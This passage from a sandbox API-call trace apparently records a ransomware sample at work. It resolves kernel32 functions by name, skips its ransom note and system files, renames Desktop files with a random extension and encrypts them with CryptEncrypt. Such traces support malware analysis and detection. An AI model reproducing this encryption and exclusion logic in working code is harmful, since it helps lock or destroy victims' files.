lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0083.378] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0083.378] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0083.378] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0083.378] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0083.378] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0083.378] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0083.379] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0083.379] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0083.379] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0083.379] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0083.379] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0083.379] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0083.379] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0083.379] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0083.379] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0083.379] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0083.379] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0083.379] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0083.379] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0083.379] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0083.379] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0083.379] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0083.379] lstrlenA (lpString="CREATETHREAD") returned 12 [0083.379] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0083.379] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0083.379] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0083.379] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0083.379] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0083.379] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0083.379] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0083.379] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0083.379] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0083.379] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0083.379] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0083.379] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0083.379] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0083.379] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0083.379] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0083.379] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0083.379] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0083.379] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0083.379] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0083.379] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0083.380] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0083.380] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0083.380] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0083.380] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0083.380] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0083.380] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0083.380] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0083.380] lstrlenA (lpString="CTRLROUTINE") returned 11 [0083.380] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0083.380] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0083.380] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0083.380] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0083.380] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0083.380] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0083.380] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0083.380] lstrlenA (lpString="DEBUGBREAK") returned 10 [0083.380] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0083.380] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0083.380] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0083.380] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0083.380] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0083.380] lstrlenA (lpString="DECODEPOINTER") returned 13 [0083.380] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0083.380] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0083.380] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0083.380] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0083.380] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0083.380] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0083.380] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0083.380] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0083.380] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0083.380] lstrlenA (lpString="DELETEATOM") returned 10 [0083.380] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0083.380] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0083.380] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0083.380] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0083.381] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0083.381] lstrlenA (lpString="DELETEFIBER") returned 11 [0083.381] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0083.381] lstrlenA (lpString="DELETEFILEA") returned 11 [0083.381] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0083.381] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0083.381] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0083.381] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0083.381] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0083.381] lstrlenA (lpString="DELETEFILEW") returned 11 [0083.381] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0083.381] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0083.381] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0083.381] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0083.381] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0083.381] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0083.381] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0083.381] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0083.381] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0083.381] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0083.381] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0083.381] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0083.381] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0083.381] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0083.381] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0083.381] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0083.381] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0083.381] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0083.381] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0083.381] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0083.381] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0083.381] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0083.381] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0083.381] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0083.381] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0083.381] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0083.381] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0083.382] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0083.382] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0083.382] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0083.382] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0083.382] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0083.382] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0083.382] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0083.382] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0083.382] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0083.382] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0083.382] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0083.382] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0083.382] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0083.382] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0083.382] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0083.382] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0083.382] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0083.382] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0083.382] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0083.382] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0083.382] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0083.382] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0083.382] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0083.382] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0083.382] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0083.382] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0083.382] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0083.382] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0083.382] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0083.382] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0083.382] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0083.382] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0083.382] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0083.382] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0083.382] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0083.382] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0083.382] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0083.383] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0083.383] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0083.383] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0083.383] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0083.383] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\g_JQdClT.mp3") returned 50 [0083.383] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\g_JQdClT.mp3.cYHgovZ") returned 58 [0083.383] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\g_JQdClT.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\g_jqdclt.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\g_JQdClT.mp3.cYHgovZ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\g_jqdclt.mp3.cyhgovz"), dwFlags=0x0) returned 1 [0083.383] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.384] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.384] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.384] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fc85980, ftCreationTime.dwHighDateTime=0x1d4c688, ftLastAccessTime.dwLowDateTime=0x61f32800, ftLastAccessTime.dwHighDateTime=0x1d4c83e, ftLastWriteTime.dwLowDateTime=0x61f32800, ftLastWriteTime.dwHighDateTime=0x1d4c83e, nFileSizeHigh=0x0, nFileSizeLow=0xf544, dwReserved0=0x0, dwReserved1=0x0, cFileName="ITt2-JROg.mp4", cAlternateFileName="ITT2-J~1.MP4")) returned 1 [0083.384] lstrcmpiW (lpString1="ITt2-JROg.mp4", lpString2="DECRYPT-FILES.txt") returned 1 [0083.384] lstrcmpiW (lpString1="ITt2-JROg.mp4", lpString2="autorun.inf") returned 1 [0083.384] lstrcmpiW (lpString1="ITt2-JROg.mp4", lpString2="boot.ini") returned 1 [0083.384] lstrcmpiW (lpString1="ITt2-JROg.mp4", lpString2="desktop.ini") returned 1 [0083.384] lstrcmpiW (lpString1="ITt2-JROg.mp4", lpString2="ntuser.dat") returned -1 [0083.384] lstrcmpiW (lpString1="ITt2-JROg.mp4", lpString2="iconcache.db") returned 1 [0083.384] lstrcmpiW (lpString1="ITt2-JROg.mp4", lpString2="bootsect.bak") returned 1 [0083.384] lstrcmpiW (lpString1="ITt2-JROg.mp4", lpString2="ntuser.dat.log") returned -1 [0083.384] lstrcmpiW (lpString1="ITt2-JROg.mp4", lpString2="thumbs.db") returned -1 [0083.385] lstrcmpiW (lpString1="ITt2-JROg.mp4", lpString2="Bootfont.bin") returned 1 [0083.385] lstrlenW (lpString="ITt2-JROg.mp4") returned 13 [0083.385] lstrcmpiW (lpString1="mp4", lpString2="lnk") returned 1 [0083.385] lstrcmpiW (lpString1="mp4", lpString2="exe") returned 1 [0083.385] lstrcmpiW (lpString1="mp4", lpString2="sys") returned -1 [0083.385] lstrcmpiW (lpString1="mp4", lpString2="dll") returned 1 [0083.385] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 38 [0083.385] lstrlenW (lpString="ITt2-JROg.mp4") returned 13 [0083.385] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0083.385] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="ITt2-JROg.mp4" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ITt2-JROg.mp4") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ITt2-JROg.mp4" [0083.385] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.385] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ITt2-JROg.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\itt2-jrog.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0083.385] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=62788) returned 1 [0083.385] CreateFileMappingW (hFile=0x438, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x43c [0083.385] MapViewOfFile (hFileMappingObject=0x43c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0083.385] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0083.386] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0083.386] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0083.386] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0083.386] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0083.387] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.387] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0083.388] CloseHandle (hObject=0x43c) returned 1 [0083.388] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.388] WriteFile (in: hFile=0x438, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0083.389] CloseHandle (hObject=0x0) returned 0 [0083.389] CloseHandle (hObject=0x438) returned 1 [0083.389] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.389] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.390] GetTickCount () returned 0x114d50b [0083.390] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.390] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0083.390] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0083.390] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0083.390] lstrlenA (lpString="kernel32.dll") returned 12 [0083.391] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0083.391] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0083.391] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0083.391] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0083.391] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0083.391] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0083.391] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0083.391] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0083.391] lstrlenA (lpString="ADDATOMA") returned 8 [0083.391] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0083.391] lstrlenA (lpString="ADDATOMW") returned 8 [0083.391] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0083.391] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0083.391] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0083.391] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0083.391] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0083.391] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0083.391] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0083.391] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0083.391] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0083.391] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0083.391] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0083.391] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0083.391] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0083.391] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0083.391] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0083.391] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0083.391] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") 